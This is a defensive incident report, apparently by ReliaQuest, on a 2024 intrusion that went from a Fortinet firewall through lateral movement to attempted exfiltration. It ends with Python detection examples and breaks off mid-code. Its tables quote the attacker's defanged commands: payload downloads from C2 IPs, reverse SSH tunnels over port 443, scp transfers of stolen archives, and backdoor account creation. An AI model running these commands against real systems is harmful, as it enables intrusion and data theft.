Key Points
- In July 2024, a ReliaQuest customer was targeted by a data exfiltration attack.
- The threat actor gained access to a Fortinet firewall and brute-forced a privileged service account to perform lateral movement.
- Several freely available tools were brought into the environment to facilitate data exfiltration, including WinRAR for compression and Secure Copy (SCP) clients for transfer.
- The ReliaQuest Threat Hunting team assisted in investigating and remediating the incident, using GreyMatter Response Playbooks for a swift response.
- Prioritizing perimeter device patch management, ensuring complete endpoint detection and response (EDR) coverage, and implementing comprehensive host-based controls can reduce attack surface and increase the difficulty for threat actors to accomplish their objectives.
In July 2024, ReliaQuest responded to a data exfiltration incident affecting a customer in the manufacturing sector. The threat actor gained access to multiple file servers and exfiltrated business-related data. However, by collaborating closely with the customer, the ReliaQuest Threat Hunting team enabled them to focus their resources on remediation efforts. ReliaQuest assisted the customer by isolating hosts, resetting user accounts, and performing GreyMatter Response Playbooks for an initial rapid response, preventing further damage and allowing for thorough investigation and subsequent remediation actions.
This report shares insights and technical details from the incident to help organizations better understand the current threat landscape and protect their environments from similar threats. It details the main stages of the exfiltration attack lifecycle, from gaining initial access through a Fortinet firewall to creating administrator user accounts for persistence, evading security controls such as Internet Explorer Enhanced Security Configuration (IE ESC), and ultimately exfiltrating data.
Additionally, we reference other tools and tactics commonly employed in data exfiltration incidents and offer practical prevention and mitigation strategies. These insights are designed to assist organizations in strengthening their security posture and implementing actionable steps to minimize the impact of similar data exfiltration attacks.
Attack Lifecycle
Initial Access
The threat actor gained initial access to the environment via an internet-facing Fortinet firewall. Due to logging retention limitations, the device compromise method is unknown, but it is likely the threat actor brute-forced the public administrator console.
The adversary brute-forced user accounts until successfully authenticating with the privileged service account SVC_1. However, attempts to use this service account on multiple Windows machines failed because SVC_1 lacked interactive logon rights; each attempt produced Windows Event ID 4625 with status code 0xC000015B ("the user has not been granted the requested logon type at this machine"). Persisting with these efforts, the threat actor eventually authenticated via Secure Shell (SSH) to a development Linux server referred to as Linux_Dev_Server_1, where no such restriction applied.
Interactive logins with service account credentials indicate potential misuse, as these accounts should only be used by applications or services, not users. This behavior suggests that the threat actor was systematically testing the service account credentials across various machines until they found one that permitted access. Restricting interactive logon permissions on multiple hosts was an effective control as it put the burden back on the adversary to perform further discovery to find additional hosts for lateral movement.
Given that 85% of breaches that ReliaQuest responded to from January to July 2024 involved service accounts, it is crucial to rigorously monitor these accounts for any anomalous activity. The misuse of service accounts for interactive logins can be a sign of an ongoing attack and should be promptly investigated to prevent further compromise.
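As an added example (not ReliaQuest's detection content), the following Python sketches the two checks that matter at this stage: a service account refused interactive logon on several hosts (Event ID 4625 with status 0xC000015B), and a service account that nonetheless logs on interactively, whether over RDP or SSH. The event lines, host names and the SVC_ naming prefix are constructed assumptions.

```python
"""Flag a service account being tried interactively across hosts.

Added example, not ReliaQuest's detection content. It walks a mixed set
of Windows Security events (flattened here to key=value lines) and Linux
sshd log lines, all constructed for this example, and reports two things
the incident hinged on: a service account whose interactive logon was
refused on several hosts (4625 / 0xC000015B), and any interactive logon
by a service account that did succeed. The SVC_ prefix is an assumed
naming convention.
"""
import re
from collections import defaultdict

INTERACTIVE_LOGON_TYPES = {"2", "10", "11"}  # Interactive, RemoteInteractive, CachedInteractive
STATUS_LOGON_TYPE_NOT_GRANTED = "0xC000015B"  # "not granted the requested logon type at this machine"
SSHD_ACCEPTED = re.compile(
    r"^\w{3}\s+\d+ [\d:]+ (?P<host>\S+) sshd\[\d+\]: Accepted \w+ for (?P<user>\S+) from (?P<src>\S+)"
)

def is_service_account(name):
    """Assumed naming convention: service accounts are prefixed SVC_."""
    return name.upper().startswith("SVC_")

def parse_windows_event(line):
    """'EventID=4625 Computer=... Status=...' -> dict (constructed flat format)."""
    return dict(tok.split("=", 1) for tok in line.split())

def analyse(lines, host_threshold=2):
    refused = defaultdict(set)   # account -> hosts that refused an interactive logon
    succeeded = []               # (account, host, how)
    for line in lines:
        m = SSHD_ACCEPTED.match(line)
        if m:
            if is_service_account(m["user"]):
                succeeded.append((m["user"], m["host"], f"ssh from {m['src']}"))
            continue
        if not line.startswith("EventID="):
            continue
        ev = parse_windows_event(line)
        acct = ev.get("TargetUserName", "")
        if not is_service_account(acct):
            continue
        if ev["EventID"] == "4625" and ev.get("Status") == STATUS_LOGON_TYPE_NOT_GRANTED:
            refused[acct].add(ev["Computer"])
        elif ev["EventID"] == "4624" and ev.get("LogonType") in INTERACTIVE_LOGON_TYPES:
            succeeded.append((acct, ev["Computer"],
                              f"logon type {ev['LogonType']} from {ev.get('IpAddress', '?')}"))
    findings = []
    for acct, hosts in sorted(refused.items()):
        # One refusal is noise; the same account refused on several hosts is credential testing.
        if len(hosts) >= host_threshold:
            findings.append(f"{acct}: interactive logon refused on {len(hosts)} hosts: "
                            + ", ".join(sorted(hosts)))
    for acct, host, how in succeeded:
        findings.append(f"{acct}: interactive logon succeeded on {host} ({how})")
    return findings

# Constructed sample telemetry: three refusals for SVC_1 across Windows hosts, a normal
# service logon (type 5), a human's wrong password, then a success over SSH on a Linux
# host and an RDP logon on a production Windows server.
SAMPLE_LINES = [
    "EventID=4625 Computer=WIN-APP01 TargetUserName=SVC_1 LogonType=10 Status=0xC000015B IpAddress=10.0.0.5",
    "EventID=4625 Computer=WIN-APP02 TargetUserName=SVC_1 LogonType=10 Status=0xC000015B IpAddress=10.0.0.5",
    "EventID=4625 Computer=WIN-APP03 TargetUserName=SVC_1 LogonType=2 Status=0xC000015B IpAddress=10.0.0.5",
    "EventID=4625 Computer=WIN-APP01 TargetUserName=jsmith LogonType=10 Status=0xC000006D IpAddress=10.0.0.7",
    "EventID=4624 Computer=WIN-APP01 TargetUserName=SVC_1 LogonType=5 IpAddress=-",
    "Jul 15 03:12:44 linux-dev-01 sshd[2231]: Accepted password for SVC_1 from 10.0.0.5 port 51234 ssh2",
    "EventID=4624 Computer=WIN-PROD01 TargetUserName=SVC_1 LogonType=10 IpAddress=10.0.0.5",
]

if __name__ == "__main__":
    for finding in analyse(SAMPLE_LINES):
        print(finding)
```

The host threshold is what separates a misconfigured application (one host, repeatedly) from an adversary walking the estate with a single credential. The second check is the one to page on: it is exactly the moment the attacker reached Linux_Dev_Server_1.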
Mitigation
Asset Management and Patching Perimeter Devices: We recently reported on an exfiltration incident where a vulnerable firewall served as the entry point of the attack, highlighting the importance of timely patching. This is especially crucial as we frequently observe this technique in data exfiltration incidents. Patching alone would not have stopped the likely vector here, a brute-force against an internet-exposed administrator console: management interfaces of perimeter devices should be reachable only from trusted management networks, and where remote administration is unavoidable, enforce multi-factor authentication and account lockout.
Hardening Service Accounts: Service accounts often lack standard password management practices, making them vulnerable to brute-force attacks. To defend against this, ensure the use of long, complex passwords. As seen in this incident, restricting interactive logon permissions is an effective measure to prevent lateral movement. For additional strategies on mitigating service account vulnerabilities, refer to our blog on service account abuse.
A ReliaQuest-authored detection successfully identified the compromised service account. GreyMatter Response Playbooks can be integrated into Automated Response Playbooks (ARPs), which automatically execute remediation actions as soon as a detection rule is triggered. Deploying ARPs can help reduce Mean Time to Contain (MTTC) to under five minutes, significantly minimizing potential damage by stopping a breach early.
Discovery
The threat actor pivoted from the compromised Fortinet firewall using the privileged service account SVC_1 and then used Living off the Land (LotL) techniques for discovery on Linux_Dev_Server_1. These commands aimed to assess user privileges, identify the hosts to which they gained access, and enumerate network shares for data exfiltration opportunities.
LotL techniques involve attackers using the commands and tools already present on a system to carry out malicious activity while blending in with legitimate processes. Because these activities look like routine administration, detection is significantly harder, and threat actors can remain undetected for longer, giving them more time to explore the environment, escalate privileges, and identify valuable data for exfiltration. This extended presence heightens the risk of more severe attacks, such as ransomware deployment, which underlines the need for behavioral detection (sequences and volumes of discovery commands per user and host, rather than any single command) and rapid response capabilities.
The table below outlines the discovery commands we observed throughout the incident on both Linux and Windows servers.
Command | Explanation |
---|---|
last | Displays a list of the most recent user logins on the host. |
python -V | Shows the version of Python installed on the host. |
cat /etc/passwd | Displays the contents of the /etc/passwd file, which contains information about user accounts on the host. |
ping 10.x.x.x | Sends Internet Control Message Protocol (ICMP) Echo Request packets to a specified IP address to test reachability. |
ps aux | Shows details about all running processes on the host. |
net use | A Windows command that lists the host's current SMB connections and mapped network drives. |
net view 10.x.x.x | Views shared resources on 10.x.x.x, such as folders. |
quser | Displays information regarding user sessions on the host. |
Mitigation
Network Segmentation: As in this incident, attackers often look for network shares to perform exfiltration. Proper network segmentation between development and production devices limits the information a threat actor can discover, increasing the difficulty and time required to identify and access critical systems and sensitive data. Only specific accounts that need to list network shares should have this privilege. This strategy helps prevent attackers from discovering critical hosts containing sensitive data and reduces the amount of confidential information they can acquire.
Lateral Movement
The threat actor used SSH to pivot between Linux servers and Remote Desktop Protocol (RDP) to move to Windows servers. Using the same service account, SVC_1, the threat actor accessed additional hosts, including another Linux Development Server (Linux_Dev_Server_2) and a production Windows server (Windows_Prod_Server_1). The adversary also accessed hosts without endpoint detection and response (EDR) sensors and logging visibility, hindering detection opportunities and allowing them to persist in the environment. Extended persistence on additional hosts complicates remediation, as more investigation is required, which leads to a longer MTTC. This gives attackers more time to exfiltrate data and deploy more destructive payloads like ransomware, causing significant operational and financial damage. This underscores the critical need for comprehensive EDR coverage and robust logging practices to detect and respond to threats promptly, minimizing the window of opportunity for attackers and reducing the risk of extensive damage.
Attackers often leverage built-in remote management tools such as SSH for Linux and RDP for Windows to move laterally within an environment. Since administrators use these tools legitimately, it is less suspicious and harder to detect when attackers use them maliciously. In some cases an adversary will install commercial remote monitoring and management (RMM) solutions for lateral movement and maintaining persistent access, which provide many of the same benefits for defense evasion.
Below are command lines used by the threat actor to move laterally to additional hosts in the environment.
Command | Explanation |
---|---|
ssh SVC_1@10.x.x.x | Linux command to establish an SSH connection to a specified IP address using the privileged service account SVC_1. |
mstsc /v:10.x.x.x | Windows command used to launch the Remote Desktop Connection client and connect to a Windows host. |
Mitigation
Limit RDP Access with Network-Level Authentication: Enable NLA so that users must authenticate before a full RDP session is established, which removes the pre-authentication attack surface of the RDP listener. Additionally, restrict RDP access to specific source IP addresses or require VPN access. NLA alone does not stop an attacker who holds valid credentials, as in this incident; source restrictions and multi-factor authentication on remote access are what limit that case. Please see our RDP brute-force blog for additional mitigation recommendations.
Complete EDR Coverage: Threat actors often target systems without EDR agents and logging visibility, as observed in this incident. This lack of coverage hinders detection and investigation, making it easier for them to achieve their objectives. To mitigate this, maintain an up-to-date inventory of assets and require EDR installation on new hosts as soon as they are commissioned.
Privilege Escalation and Persistence
The threat actor ran the command sudo su to escalate their privileges to root on host Linux_Dev_Server_1. The following day, the attacker created several user accounts with inconspicuous names like “itsupport.” In an effort to escalate privileges, the attacker then attempted to edit the Linux /etc/sudoers file, which specifies users with elevated privileges.
Listed below are the commands executed by the threat actor to create the user itsupport and escalate privileges on Linux_Dev_Server_1.
Linux Command | Explanation |
---|---|
useradd itsupport | Creates a new local user account named itsupport. |
cat /etc/sudoers | Displays the contents of the sudoers file, which specifies users with elevated privileges. |
chmod +w /etc/sudoers | Adds write permission to the sudoers file (normally mode 0440) so that it can be edited directly. |
vim /etc/sudoers | Opens the sudoers file in the vim text editor, likely to add the newly created user itsupport and grant it root privileges. |
chmod -w /etc/sudoers | Removes the write permission again. sudo refuses to run while sudoers carries permissions beyond 0440, so this step is needed for the edit to take effect, and it also leaves the file looking untouched. |
The following day, the threat actor created the same itsupport user on Windows_Prod_Server_1 and subsequently added itsupport to the Local Administrators group to escalate privileges using these commands.
Windows Command | Explanation |
---|---|
net user itsupport PASSWORD /add | Creates a new local user account named itsupport with a specified password. |
net localgroup administrators itsupport /add | Adds the itsupport user to the Administrators group, granting local administrative privileges. |
Threat actors often create new user accounts with administrative privileges instead of using their current compromised accounts. The advantages of doing this include:
- New user accounts ensure persistence even if the original account is disabled.
- Creating a new user account helps evade detection, as a new account may not immediately raise suspicion compared to unusual activity on an existing account.
- By creating new user accounts, attackers can distribute their activities across multiple accounts, making it harder for defenders to trace and understand the full scope of the attack.
Mitigation
File Integrity Monitoring and Access Controls: Monitoring account creation events (Windows Event ID 4720; useradd entries in the Linux authentication log) and changes to the local Administrators group (Event ID 4732) is crucial for detecting unauthorized privilege escalation and persistence. Security teams should also implement file integrity monitoring to detect unauthorized changes to critical files like /etc/sudoers and the /etc/sudoers.d directory, and enforce strict access controls on sensitive files and directories to prevent unauthorized modifications. By closely monitoring these activities and implementing robust security controls, organizations can detect and respond to privilege escalation attempts more effectively.
Command-and-Control
The threat actor used the Linux commands wget and curl to retrieve payloads over HTTP from a Vultr-hosted IP address on Linux_Dev_Server_2. The attacker then used OpenSSH to open reverse SSH tunnels to another IP address, hosted by DigitalOcean, to establish command-and-control (C2) access.
The table below outlines the commands that were run to retrieve payloads from the C2 IP address.
Command | Explanation |
---|---|
curl -v hxxp[://]149.28.219[.]210:9000 | Sends a verbose (-v) HTTP GET request to the C2 server at 149.28.219[.]210 on port 9000, likely to confirm the server was reachable. |
wget hxxp[://]149.28.219[.]210/payload.tar.gz | Retrieves the tarball payload payload.tar.gz from the hardcoded IP address 149.28.219[.]210 over HTTP. |
The threat actor created a reverse SSH tunnel from Linux_Dev_Server_1 to their DigitalOcean IP address. The server connected outbound to the attacker's host on TCP port 443, and the -R option asked that host to listen on a high port and forward any connection it received back to the server's own SSH port 22. Because the connection is initiated from inside the network and uses port 443, which is normally reserved for HTTPS and allowed outbound, the SSH traffic blends in and is harder to detect and block. This gave the attacker a direct path back into Linux_Dev_Server_1 that did not depend on the compromised Fortinet firewall, establishing further persistence in the environment.
This table lists the commands run by the attacker to set up an SSH tunnel over HTTPS port 443.
Command | Explanation |
---|---|
ssh -qTfnN -R 43222:127.0.0.1:22 <user>@167.172.134[.]147 -p443 | Connects to the attacker's DigitalOcean host on port 443 (-p443) and requests a reverse forward (-R): port 43222 on that host is forwarded to 127.0.0.1:22 on Linux_Dev_Server_1. The remaining options keep the session quiet (-q), disable pseudo-terminal allocation (-T), background the process (-f), redirect stdin from /dev/null (-n), and run no remote command (-N), so the tunnel stays up with little trace. The username is omitted here. |
ssh -CfNg -R 43223:127.0.0.1:22 <user>@167.172.134[.]147 -p443 | A second tunnel of the same form on port 43223, this time with compression (-C), backgrounded (-f), with no remote command (-N), and with -g, which lets other hosts connect to locally forwarded ports (it does not affect this -R forward). |
Vultr and DigitalOcean are examples of cloud-hosting providers. Threat actors frequently exploit these platforms to establish their C2 infrastructure, primarily because they are easy to set up and allow server deployment in geographic locations closer to the target. This enables attackers to swiftly deploy and scale their operations with minimal effort. Attackers prefer less mainstream providers like DigitalOcean and Vultr due to their comparatively lax takedown and verification protocols compared to more recognized providers like Amazon Web Services (AWS).
To counter these threats, ReliaQuest’s Threat Intelligence team maintains an up-to-date feed of indicators of compromise (IOCs) in GreyMatter Intel. This repository integrates more than 40 paid and open-source threat feeds and also incorporates primary source research and insights from breaches across the ReliaQuest customer base, helping organizations effectively detect and mitigate similar attacks. Following this incident, the IP addresses involved were added to GreyMatter Intel, ensuring enhanced protection for customers.
Mitigation
Detect/Block Traffic for Applications Over Non-Standard Ports: Threat actors often run applications over non-standard ports to evade detection. Outbound SSH on port 22 is typically monitored and restricted, whereas ports 443 and 80 are almost always allowed outbound and watched less closely, which is why the attacker tunneled SSH over them in this incident. Port-based firewall rules cannot tell the two apart; intrusion detection and prevention systems (IDS/IPS) that identify the application protocol from the traffic itself, rather than from the port number, can detect and block SSH or other protocols appearing on HTTP/HTTPS ports.
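What an IDS does to catch this is identify the protocol from the payload rather than the port. The following Python is an added example, not ReliaQuest's or any vendor's code: it classifies the first bytes each peer sends (SSH identification string, TLS handshake record, HTTP request or status line) and reports flows that do not match what the destination port implies. The flows are constructed byte strings, using addresses from this report's IOC list for the malicious ones and TEST-NET space for the benign ones.

```python
"""Identify the application protocol from payload, not from the port.

Added example, not ReliaQuest's content. Port-based rules see "443" and
assume HTTPS; this looks at the first bytes each side sends and reports
flows whose protocol does not match the port's expectation. SSH is easy
to spot because both peers begin with an identification string
("SSH-2.0-..."), TLS begins with a handshake record (0x16, 0x03, ...),
and HTTP begins with a method or a status line. All flows below are
constructed.
"""

EXPECTED_ON_PORT = {443: "tls", 80: "http", 22: "ssh"}
HTTP_METHODS = {b"GET", b"POST", b"HEAD", b"PUT", b"DELETE", b"OPTIONS", b"CONNECT", b"PATCH"}

def classify(first_bytes):
    """Best-effort protocol label for the first bytes one side sent."""
    if first_bytes.startswith(b"SSH-"):
        return "ssh"
    if len(first_bytes) >= 3 and first_bytes[0] == 0x16 and first_bytes[1] == 0x03:
        return "tls"                      # TLS handshake record, any 1.x version byte
    if first_bytes.startswith(b"HTTP/") or first_bytes.split(b" ", 1)[0] in HTTP_METHODS:
        return "http"
    return "unknown"

def check_flow(dst_ip, dst_port, client_bytes, server_bytes):
    """Return a finding string, or None when the traffic matches the port."""
    expected = EXPECTED_ON_PORT.get(dst_port)
    seen = {classify(client_bytes), classify(server_bytes)} - {"unknown"}
    if expected is None or not seen:
        return None                       # no expectation for this port, or nothing recognizable yet
    if seen == {expected}:
        return None
    return f"{dst_ip}:{dst_port} expected {expected}, saw {'/'.join(sorted(seen))}"

def scan(flows):
    """Apply check_flow to (dst_ip, dst_port, client_bytes, server_bytes) tuples."""
    return [f for f in (check_flow(*flow) for flow in flows) if f]

# Constructed flows: (dst_ip, dst_port, first client bytes, first server bytes).
SAMPLE_FLOWS = [
    # Reverse SSH tunnel to the attacker's host on 443: both sides send an SSH banner.
    ("167.172.134.147", 443, b"SSH-2.0-OpenSSH_8.9p1\r\n", b"SSH-2.0-OpenSSH_9.2\r\n"),
    # Ordinary HTTPS: ClientHello then ServerHello records.
    ("203.0.113.10", 443, b"\x16\x03\x01\x00\xc4\x01\x00\x00\xc0\x03\x03", b"\x16\x03\x03\x00\x7a\x02\x00\x00\x76"),
    # scp to port 80 from a PuTTY client.
    ("209.250.244.179", 80, b"SSH-2.0-PuTTY_Release_0.81\r\n", b"SSH-2.0-OpenSSH_9.2\r\n"),
    # Ordinary HTTP.
    ("203.0.113.10", 80, b"GET / HTTP/1.1\r\nHost: example.test\r\n", b"HTTP/1.1 200 OK\r\n"),
    # A port with no expectation: nothing to say.
    ("149.28.219.210", 9000, b"GET / HTTP/1.1\r\n", b"HTTP/1.1 200 OK\r\n"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_FLOWS):
        print(finding)
```

Suricata's app-layer protocol detection and Zeek's dynamic protocol detection do the same thing at line rate. The point is that a rule such as "SSH seen on port 443" is trivial once the protocol is identified, whereas no port-based rule can express it.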
Defense Evasion
Many of the adversary’s actions in this incident—such as using applications over non-standard ports and leveraging LotL techniques—had the aim of evading defenses. In addition to these actions, the adversary also manually modified the sudoers file to avoid triggering alerts, deleted payloads after execution, and installed Firefox to evade Internet Explorer security controls.
The threat actor edited the /etc/sudoers file directly with the vim text editor instead of the recommended visudo command. visudo is the standard way to edit sudoers because it locks the file and validates the syntax before saving, avoiding mistakes that can lock every user out of sudo. Attackers commonly escalate privileges by adding compromised accounts to sudoers to gain root permissions, so visudo executions are frequently monitored. In this incident, the adversary edited the file directly with vim to evade detections keyed on the visudo process. Direct edits are suspicious in themselves, since legitimate changes almost always go through visudo or through adding the user to the sudo or wheel group with usermod; detections should therefore watch the file (writes, permission changes, and content drift) rather than only the editor used.
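The sudoers tampering in the Privilege Escalation and Persistence section and the point above about vim bypassing visudo-based detections both come down to one check: compare the file's content and mode with a known-good copy. The following Python is an added example, not ReliaQuest's tooling. The baseline, the tampered file and the itsupport NOPASSWD line are constructed assumptions, since the report does not show the exact line the attacker added.

```python
"""Content-based check of /etc/sudoers against a known-good baseline.

Added example, not ReliaQuest's tooling. It compares the effective rules
in a baseline copy of sudoers with those in the current file and checks
the file mode, so a grant added with vim, cat or any other editor is
reported just as one added through visudo would be. The baseline and the
tampered file below are constructed; the itsupport NOPASSWD rule is an
assumption about what the attacker added.
"""
import os

SUDOERS_MODE = 0o440                          # sudo refuses to run with extra bits set
TRUSTED_PRINCIPALS = {"root", "%sudo", "%wheel"}  # principals that normally hold rules

def effective_rules(text):
    """Set of rule lines: comments, blank lines and Defaults dropped,
    backslash continuations joined, whitespace normalized."""
    rules, pending = set(), ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):
            pending += line[:-1] + " "
            continue
        line, pending = (pending + line).strip(), ""
        if not line or line.startswith("Defaults"):
            continue
        if line.startswith("#") and not line.startswith("#include"):
            continue                          # plain comment; #include/#includedir are directives
        rules.add(" ".join(line.split()))
    return rules

def audit_sudoers(baseline_text, current_text, current_mode):
    """Return a list of findings; an empty list means sudoers matches the baseline."""
    findings = []
    if (current_mode & 0o777) & ~SUDOERS_MODE:
        findings.append(f"mode is {oct(current_mode & 0o777)}, expected 0o440")
    base, cur = effective_rules(baseline_text), effective_rules(current_text)
    for rule in sorted(cur - base):
        principal = rule.split()[0]
        severity = "high" if "NOPASSWD" in rule or principal not in TRUSTED_PRINCIPALS else "medium"
        findings.append(f"new rule ({severity}): {rule}")
    for rule in sorted(base - cur):
        findings.append(f"removed rule: {rule}")
    return findings

def audit_live(baseline_path, sudoers_path="/etc/sudoers"):
    """Run the audit against the real file (needs read access to sudoers)."""
    with open(baseline_path) as b, open(sudoers_path) as c:
        return audit_sudoers(b.read(), c.read(), os.stat(sudoers_path).st_mode)

# Constructed baseline, e.g. captured from the golden image at build time.
BASELINE = """\
# /etc/sudoers baseline (constructed for this example)
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
@includedir /etc/sudoers.d
"""
# Assumed attacker edit: the report says itsupport was likely added to sudoers.
TAMPERED = BASELINE + "itsupport ALL=(ALL) NOPASSWD: ALL\n"

if __name__ == "__main__":
    for finding in audit_sudoers(BASELINE, TAMPERED, 0o440):
        print(finding)
```

Run it from a scheduled job or a configuration-management agent, and pair it with an auditd watch on /etc/sudoers and /etc/sudoers.d so the write itself is logged. The content diff then tells the analyst what changed, independent of whether vim, visudo or a shell redirection did the writing.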
Additionally, the threat actor checked the status of Internet Explorer Enhanced Security Configuration (IE ESC), a Windows Server feature that restricts what Internet Explorer can load; it constrains only Internet Explorer. After discovering that IE ESC was enabled, the threat actor downloaded Firefox to bypass it. They then ran Firefox in a private browsing session, which does not save history or cookies, to leave fewer artifacts for forensic analysis.
The table below lists the commands run by the attacker to perform these activities.
Command | Explanation |
---|---|
servermanager.exe | Microsoft application used for managing Windows Servers, allowing administrators to install, configure, and manage server roles and features. |
rundll32.exe C:\Windows\system32\iesetup.dll,IEShowHardeningDialog | Launched by Server Manager: opens the Internet Explorer Enhanced Security Configuration dialog, which shows whether IE ESC is on or off for administrators and users. |
curl -k -O hxxps[://]cdn.stubdownloader.services[.]mozilla[.]com/builds/firefox-latest-ssl/en-US/win64/…/Firefox%20Setup%20128.0.exe | Uses cURL to download the Firefox setup executable from the specified URL, ignoring certificate errors (-k) and saving it under its remote file name (-O). |
C:\Program Files\Mozilla Firefox\private_browsing.exe | Starts Firefox in a private browsing session, which does not save history or cookies, leaving fewer browsing artifacts for forensic analysis. |
Mitigation
Restrict the Use of Unauthorized Software: IE ESC constrains only Internet Explorer, so the attacker bypassed it simply by installing another browser. Application control tools such as AppLocker and Windows Defender Application Control, or the older Software Restriction Policies (SRPs), can restrict execution to authorized applications; configured as an allowlist, they would have blocked the Firefox installer and the WinRAR and pscp binaries used later in the attack.
Execution
The threat actor retrieved a tarball (.tar.gz) payload over HTTP from their Vultr C2 IP address, the same host they had probed on port 9000 with cURL, on Linux_Dev_Server_2. After extracting the payload and making it executable, the threat actor attempted to run it five times with nohup (no hang up), which keeps a process running after the SSH session that started it ends. Each execution attempt was blocked by the EDR agent on the host. The threat actor then listed the running processes, likely to check for an EDR agent and troubleshoot why the payload would not run. After deleting the payload to hinder forensic analysis, the attacker ceased all activity on this host. This underscores the importance of maintaining effective EDR coverage to prevent attackers from advancing through the kill chain.
The table below outlines the commands used by the threat actor to execute their payload, in chronological order.
Command | Explanation |
---|---|
wget hxxp[://]149.28.219[.]210/payload.tar.gz | Retrieves the tarball payload payload.tar.gz from the hardcoded IP address 149.28.219[.]210 over HTTP. |
tar xzvf /tmp/payload.tar.gz | Extracts the contents of the tarball (a compressed archive file). |
chmod +x /tmp/payload | Adds executable permission to the payload. |
nohup /tmp/payload -nostderr | Executes the payload immune to hangup signals, so it survives the SSH session ending. The -nostderr argument is not a nohup option; it is passed to the payload itself, presumably to suppress its own error output. |
rm -f /tmp/payload | Removes the payload from the host to prevent forensic analysis. |
Mitigation
Set EDR Policy to Block Threats: Setting the EDR policy to “block” rather than just “detect” malicious threats is crucial for immediate threat mitigation and reducing MTTC. As observed in this incident, blocking threats in real time prevents further damage and minimizes the impact of an attack.
Exfiltration
A day after failing to execute their malicious payload on Linux_Dev_Server_2, the adversary used the freely available Windows compression tool WinRAR to compress data. They then attempted to exfiltrate the data to their C2 IP addresses over the HTTPS and HTTP ports (443 and 80) using an SCP client (scp, which ships with OpenSSH, alongside PuTTY's pscp.exe, which they also downloaded); SCP transfers files over the encrypted SSH protocol. Port 443 carries legitimate HTTPS traffic, so it is usually allowed through firewalls and monitored less rigorously than SSH port 22, which is more often scrutinized because of its use in lateral movement and exfiltration. By targeting ports 443 and 80, the attacker aimed to exploit this less stringent monitoring to evade detection.
The threat actor attempted exfiltration to various IP addresses multiple times through different commands. However, these attempts were interrupted by a User Behavior Analytics (UBA) tool and remediation efforts carried out by the customer and ReliaQuest to contain the host. These remediation efforts included performing a full investigation on all the compromised hosts and resetting all the compromised service accounts. ReliaQuest also performed GreyMatter Response Playbooks on behalf of the customer to block the IP addresses observed in the incident.
The table below outlines the commands run by the attacker in chronological order before they were interrupted by UBA and removed from the environment:
Command | Explanation |
---|---|
curl -k -O hxxps[://]www.rarlab[.]com/rar/winrar-x64-701.exe | Downloads a WinRAR executable via cURL. |
winrar-x64-701.exe | Installs WinRAR. |
C:\Program Files\WinRAR\WinRAR.exe a -ep1 -scul -r0 -iext -imon1 -- . “Z:\Multiple\Directory\Paths” | Uses WinRAR to add (a) the listed file-share directories, which contained sensitive data, to a new archive, DATA.rar, recursing into subdirectories (-r0) and dropping the base path from the stored names (-ep1). |
curl -k -O hxxps[://]the.earth[.]li/~sgtatham/putty/latest/w64/pscp.exe | Downloads pscp.exe, the PuTTY SCP client, from the PuTTY author's site, ignoring certificate errors (-k). |
scp DATA.rar test[@]192.241.139[.]130:/home/test -P 443 | Transfers DATA.rar to the DigitalOcean IP address 192.241.139[.]130 over HTTPS port 443 into the “test” user's home directory. |
scp -P 443 DATA.zip root[@]45.77.94[.]53:/root | Transfers DATA.zip to the Vultr IP address 45.77.94[.]53 over HTTPS port 443 into the root user's home directory. |
scp -P 80 DATA.zip root[@]209.250.244[.]179:/root/ | Transfers DATA.zip to the Vultr IP address 209.250.244[.]179 over HTTP port 80 into the root user's home directory. |
Attackers often use freely available compression tools such as WinRAR to compress large amounts of data. Compression speeds up the exfiltration and shrinks the transfer, which can keep it below the volume thresholds that network anomaly alerts rely on. Likewise, they favor widely used transfer tools such as SCP because their legitimate use is common, so their presence is less likely to raise red flags with security monitoring systems.
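The tunnel commands in the Command-and-Control section and the scp transfers above share one structure: an SSH-family client, a port other than 22, and a remote host that is not the organization's. The following Python is an added example, not ReliaQuest's detection logic. It parses the OpenSSH ssh/scp and PuTTY pscp option syntax well enough to pull out the port, any reverse forward (-R) and the remote host, then reports reverse tunnels that expose a local port and transfers to hosts outside private address space. The sample lines are reconstructed from the commands in this report (the tunnel username is kept as a placeholder) plus two constructed benign ones; treating any non-IP hostname as external is an assumption made for this example.

```python
"""Flag suspicious ssh/scp/pscp invocations from process command lines.

Added example, not ReliaQuest's detection logic. Given a command line as
recorded by EDR, Sysmon or auditd, it extracts the port, any reverse
forward (-R) and the remote host, and reports reverse tunnels that expose
a local port plus transfers to hosts outside private address space.
Sample lines: the report's commands (username placeholder kept) and two
constructed benign ones. Non-IP hostnames are assumed external here.
"""
import ipaddress
import re
import shlex

PORT_FLAG = {"ssh": "p", "scp": "P", "pscp": "P"}   # scp/pscp use -p for "preserve times"
ARG_FLAGS = {                                        # single-letter options that take a value
    "ssh": set("bcDEeFIiJLlmOopQRSWw"),
    "scp": set("cDFiJloPS"),
    "pscp": set("Pli"),
}
PUTTY_WORD_OPTS = {"-pw", "-pwfile", "-hostkey"}     # PuTTY options spelled as whole words

def parse_cmdline(cmdline):
    """Return {'tool', 'port', 'reverse', 'operands'} or None if not an SSH-family tool."""
    argv = shlex.split(cmdline.replace("[.]", "."))  # undo defanging
    tool = re.split(r"[\\/]", argv[0])[-1].lower()
    if tool.endswith(".exe"):
        tool = tool[:-4]
    if tool not in PORT_FLAG:
        return None
    info = {"tool": tool, "port": 22, "reverse": [], "operands": []}
    i = 1
    while i < len(argv):
        arg = argv[i]
        if tool == "pscp" and arg in PUTTY_WORD_OPTS:
            i += 2                                   # skip the option and its value
            continue
        if arg.startswith("-") and arg not in ("-", "--"):
            flags = arg[1:]
            for j, ch in enumerate(flags):
                if ch in ARG_FLAGS[tool]:
                    value = flags[j + 1:]            # -p443 style
                    if not value:                    # -p 443 style
                        i += 1
                        value = argv[i]
                    if ch == PORT_FLAG[tool]:
                        info["port"] = int(value)
                    elif ch == "R" and tool == "ssh":
                        info["reverse"].append(value)
                    break                            # the rest of this token was the value
        else:
            info["operands"].append(arg)
        i += 1
    return info

def remote_hosts(info):
    """Destination host(s): first operand for ssh; [user@]host:path operands for scp/pscp."""
    if info["tool"] == "ssh":
        return [info["operands"][0].rsplit("@", 1)[-1]] if info["operands"] else []
    return [op.split(":", 1)[0].rsplit("@", 1)[-1]
            for op in info["operands"]
            if ":" in op and not re.match(r"^[A-Za-z]:", op)]   # skip Windows drive paths

def is_external(host):
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
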